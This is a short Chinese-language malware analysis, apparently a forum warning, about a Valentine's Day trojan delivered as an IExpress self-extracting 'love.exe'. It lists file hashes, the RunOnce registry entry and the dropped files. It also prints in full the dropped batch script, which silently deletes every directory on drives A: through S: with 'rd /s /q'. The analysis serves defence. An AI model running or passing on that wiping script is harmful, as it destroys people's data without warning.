感谢晟地的云海飞舞提供样本.
love.exe是WINDOWS下的Iexpress自解压包.杀软不报
释放的ILOVEY~2.EXE[病毒主体>瑞星报Trojan.Smalldrp.c
love.exe:
SHA-160 : 985DDD9989215C29B035B3BD460426A1CDCCB0FF
MD5 : 3168EA2715DCC23A80137BA70A331D67
CRC-32 : 23ED4B9A
修改注册表启动项目:
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
注册表值: wextract_cleanup1
类型: REG_SZ
值: rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\ILOVEY~2.EXE"
释放下列文件:
路径: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IXP000.TMP\ILOVEY~2.EXE
信息: 我爱你 (I LOVE YOU)
c:\Documents and Settings\Administrator\Local Settings\Temp\bt6824.bat
bt+随机4位数字.bat
内容如下:
@echo off
@rd /s /q A:\
@rd /s /q B:\
@rd /s /q C:\
@rd /s /q D:\
@rd /s /q E:\
@rd /s /q F:\
@rd /s /q G:\
@rd /s /q H:\
@rd /s /q I:\
@rd /s /q L:\
@rd /s /q M:\
@rd /s /q N:\
@rd /s /q O:\
@rd /s /q P:\
@rd /s /q Q:\
@rd /s /q R:\
@rd /s /q S:\
PS:删除所有盘符下的所有目录.包括目录下的子目录.加了/S 和 /Q命令.完全静默模式执行.目的在于删除硬盘所有数据.包括软盘,U盘等.但在我的虚拟机里只实现了删除C盘尚未使用的数据.
情人节到了.病毒随之疯狂.网友请提高警惕.
